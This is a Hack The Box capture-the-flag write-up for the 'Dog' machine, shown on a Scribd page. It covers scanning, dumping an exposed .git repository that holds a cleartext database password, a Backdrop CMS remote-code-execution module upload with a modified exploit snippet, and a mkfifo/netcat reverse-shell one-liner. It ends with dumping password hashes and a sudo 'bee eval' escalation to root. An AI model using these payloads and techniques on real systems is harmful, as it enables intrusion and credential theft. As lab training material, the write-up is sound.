Scribd
Upload
79 views6 pages

Dog HTB Writeup

The document details a penetration testing process on a target machine (10.10.11.58) using tools like RustScan and Nmap, revealing open ports for SSH and HTTP. It describes exploiting a vulnerability in Backdrop CMS to gain administrative access, followed by retrieving sensitive data from the exposed .git folder and accessing the MySQL database. The final steps include gaining SSH access to the machine and utilizing a command-line utility for further actions.

Uploaded by

leojhoao03
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
79 views6 pages

Dog HTB Writeup

The document details a penetration testing process on a target machine (10.10.11.58) using tools like RustScan and Nmap, revealing open ports for SSH and HTTP. It describes exploiting a vulnerability in Backdrop CMS to gain administrative access, followed by retrieving sensitive data from the exposed .git folder and accessing the MySQL database. The final steps include gaining SSH access to the machine and utilizing a command-line utility for further actions.

Uploaded by

leojhoao03
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Dog (10.10.11.

58) (1)
Enumeration & Data Gathering
rustscan -a [Link] -- -sC -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: [Link] :
: [Link] :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/kali/.[Link]"


[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open [Link]:80
Open [Link]:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip [Link]
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( [Link] ) at 2025-03-08 20:11 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating SYN Stealth Scan at 20:11
Scanning [Link] ([Link]) [2 ports]
Discovered open port 80/tcp on [Link]
Discovered open port 22/tcp on [Link]
Completed SYN Stealth Scan at 20:11, 0.35s elapsed (2 total ports)
NSE: Script scanning [Link].
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:12, 11.32s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Nmap scan report for [Link] ([Link])
Host is up, received user-set (0.33s latency).
Scanned at 2025-03-08 [Link] +00 for 12s

PORT STATE SERVICE REASON


22/tcp open ssh syn-ack ttl 63
| ssh-hostkey:
| 3072 [Link] (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw
| 256 [Link] (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgs
| 256 [Link] (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open http syn-ack ttl 63
| [Link]: 22 disallowed entries
| /core/ /profiles/ /[Link] /[Link] /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 ([Link]
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-git:
| [Link]:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:[Link]

Dog ([Link]) (1) 1


NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds
Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

Port 22 - SSH

Port 80 - HTTP

/.git Folder exposed

We use git-dumper to dump and recontruct file from the exposed .git folder found

git-dumper [Link] ./gitdump

Within that we managed to get the following data

root:BackDropJ2024DS2024

tiffany

Backdrop CMS V1.27.1

Dog ([Link]) (1) 2


If we try that sql password with Tiffany on the login it would work as well and take us to the CMS Administrator Dash

Exploitation
Now that we have access to the website as an administrator there is plenty of stuffs we can do! What stands up is this RCE . How I found it? A simple search for
the backdrop with the specified version we found.
Let’s start by building the shell using the POC script given in ExploitDB!

┌──(kali ㉿kali)-[~/htb/pwn/dog]
└─$ python3 [Link]
Usage: python [Link] [url]


┌──(kali kali)-[~/htb/pwn/dog]
└─$ python3 [Link] [Link]
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! [Link]
Go to [Link] and upload the [Link] for Manual Installation.
Your shell address: [Link]

If we try to upload the generated [Link] we’ll get an error:

Lets try to tweak the script to gen us a .[Link] instead maybe that would help us bypass this, simple edit the create_zip func and add the appropriate import.

import tarfile

def create_zip(info_path, php_path):


tar_filename = "[Link]"
with [Link](tar_filename, "w:gz") as tar:
[Link](info_path, arcname='shell/[Link]')
[Link](php_path, arcname='shell/[Link]')
return tar_filename

And yes it did!

Dog ([Link]) (1) 3


Now if we go to [Link] we’ll get our PHP shell from which we can spawn a revshell using

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $IP $PORT >/tmp/f

Great now we have a rev shell to the machine! Lets check what user we got

www-data@dog:/var/www/html/modules/shell$ cat /etc/passwd


cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

Ok there seem to be 3, also let’s note that Backdrop CMS is currently running under /var/www/html (this will be crucial later, me from the future 😛 )

Also since we’re now in the machine we can access directly the SQL DB, let’s do and check if we got anything intersting there

www-data@dog:/var/www/html$ mysql -u root -p


Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11969
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its


affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Alright, we’re in, lets see what we got here

mysql> SHOW DATABASES;


+--------------------+
| Database |
+--------------------+
| backdrop |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)

mysql> use backdrop;


Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_backdrop |
+-----------------------------+
| batch |
| cache |
| ... |
| ... |
| users |
| users_roles |
| variable |
| watchdog |
+-----------------------------+

Dog ([Link]) (1) 4


59 rows in set (0.00 sec)

mysql> select * from users;


+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+
| uid | name | pass | mail | signature | signature_format | created | changed | access | login | status
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+
| 0| | | | | NULL | 0| 0| 0| 0| 0 | NULL | | 0|
| 1 | jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@[Link] | | NULL | 1720548614 | 17205
| 2 | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@[Link] | | NULL | 1720584462 | 1720
| 3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@[Link] | | NULL |1
| 5 | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@[Link] | | NULL | 1720632910 | 1720632910 |
| 6 | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@[Link] | | NULL | 1720632931 | 172
| 7 | axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@[Link] | | NULL | 1720632952 | 1720
| 8 | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/[Link] | rosa@[Link] | | NULL | 1720632982 | 17206
| 10 | tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@[Link] | | NULL | 1723752136 | 1723
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+
9 rows in set (0.02 sec)

I tried cracking both hashes of Jobert and John but no success.

As a last resort and just out of luck I checked if tiffany’s password would work on any of the users and it did with johncusack 🤦🏻‍♂️
ssh johncusack@[Link]
johncusack@[Link]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

* Documentation: [Link]
* Management: [Link]
* Support: [Link]

johncusack@dog:~$ cat [Link]


375df087aaebc87d7e4ab8614ff2b53f

Privilege Escalation

Ok we got sudo on Bee

Bee is a command line utility for Backdrop CMS. It includes commands that allow
developers to interact with Backdrop sites, performing actions like:

Running cron

Clearing caches

Downloading and installing Backdrop

Downloading, enabling and disabling projects

Viewing information about a site and/or available projects

Source

johncusack@dog:~$ sudo bee --help


🐝 Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
--root
Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

......

ADVANCED
db-query
dbq
Execute a query using db_query().

eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

Eval argument is definitely interesting here it says it can execute PHP code? so can we use it to spawn shell? Lets try it out!

Dog ([Link]) (1) 5


johncusack@dog:~$ sudo bee eval 'system("/bin/bash");'

✘ The required bootstrap level for 'eval' is not ready.

Hmm something is wrong here? Lets use status to check what’s going on

johncusack@dog:~$ sudo bee status

⚠ No Backdrop installation found. Run this command again from within a Backdrop installation, or use the '--root' global
option.

Ok I see, it couldnt detect the backdrop installation path but we already know this from the previous shell we dropped to get the initial access and we can
specify it using —root

johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("/bin/bash");'


root@dog:/var/www/html# cat /root/[Link]
ddbe23c2046a10d74c829d56084918f2
root@dog:/var/www/html#

Dog ([Link]) (1) 6

You might also like